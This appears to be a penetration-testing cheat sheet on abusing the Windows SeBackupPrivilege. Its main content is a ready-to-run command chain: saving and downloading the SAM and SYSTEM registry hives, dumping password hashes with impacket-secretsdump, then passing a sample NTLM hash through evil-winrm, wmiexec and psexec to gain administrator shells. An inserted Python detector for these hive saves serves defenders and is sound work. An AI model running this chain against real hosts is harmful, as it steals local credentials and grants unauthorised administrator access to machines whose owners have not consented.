SeBackupPrivilege (Local Privilege Escalation)

Detect

*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeBackupPrivilege             Back up files and directories       Enabled

Abuse

SAM/SYSTEM

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
download sam
download system
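
Defender-side view of the two reg save commands above, as an added example that is not part of the original cheat sheet: a Python detector that flags an account saving both the SAM and SYSTEM hives on one host within a short window. The event field names (host, user, time, cmd), the 10-minute window and the sample events are constructed assumptions; map them to your own process-creation telemetry with command-line logging.

```python
import re
from datetime import datetime, timedelta

# SAM holds local account hashes; SYSTEM holds the boot key needed to decrypt them.
SENSITIVE = {"SAM", "SYSTEM", "SECURITY"}

# reg / reg.exe (optionally quoted or path-qualified), then "save" and an HKLM key.
REG_SAVE = re.compile(
    r'(?:^|[\\/"\s])reg(?:\.exe)?"?\s+save\s+"?'
    r'(?:HKLM|HKEY_LOCAL_MACHINE)\\(?P<hive>[A-Za-z]+)', re.IGNORECASE)

def saved_hive(command_line):
    """Return the sensitive hive a command line saves (SAM/SYSTEM/SECURITY), else None."""
    m = REG_SAVE.search(command_line)
    hive = m.group("hive").upper() if m else None
    return hive if hive in SENSITIVE else None

def find_hive_dumps(events, window=timedelta(minutes=10)):
    """Return (host, user) pairs that saved both SAM and SYSTEM within `window`."""
    last_save = {}  # (host, user) -> {hive: time of most recent save}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        hive = saved_hive(ev["cmd"])
        if hive is None:
            continue
        key = (ev["host"], ev["user"])
        recent = last_save.setdefault(key, {})
        recent[hive] = ev["time"]
        fresh = {h for h, t in recent.items() if ev["time"] - t <= window}
        if {"SAM", "SYSTEM"} <= fresh and key not in alerts:
            alerts.append(key)
    return alerts

def _ev(host, user, time, cmd):
    return {"host": host, "user": user, "time": datetime.fromisoformat(time), "cmd": cmd}

# Constructed sample events (hypothetical field names, not real telemetry).
SAMPLE_EVENTS = [
    _ev("WS01", "svc_backup", "2024-01-01T10:00:00", r"reg save HKLM\SAM sam"),
    _ev("WS01", "svc_backup", "2024-01-01T10:00:05",
        r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SYSTEM system'),
    _ev("WS02", "alice", "2024-01-01T11:00:00", r"reg save HKLM\SOFTWARE sw.hiv"),
    _ev("WS03", "bob", "2024-01-01T09:00:00", r"reg save HKLM\SAM sam"),
    _ev("WS03", "bob", "2024-01-01T15:00:00", r"reg save HKLM\SYSTEM system"),
]

if __name__ == "__main__":
    for host, user in find_hive_dumps(SAMPLE_EVENTS):
        print(f"ALERT: {user}@{host} saved SAM and SYSTEM hives")
```

The detector covers only the reg save form shown on this page; pair it with a review of which accounts hold SeBackupPrivilege.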

Hash Dump

impacket-secretsdump -system system -sam sam LOCAL

PassTheHash (PtH)

WINRM

evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'

SMB

wmiexec

impacket-wmiexec WORKGROUP/administrator@192.168.1.58 -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c'

psexec

impacket-psexec -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c' WORKGROUP/administrator@192.168.1.58 cmd.exe